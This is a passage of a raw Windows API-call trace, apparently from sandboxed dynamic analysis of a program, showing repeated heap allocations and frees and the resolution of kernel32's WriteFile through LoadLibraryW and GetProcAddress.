hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.587] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.587] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0185.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0185.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.589] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0185.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.593] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd720 [0185.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd720, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.594] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0185.594] HeapFree (in: 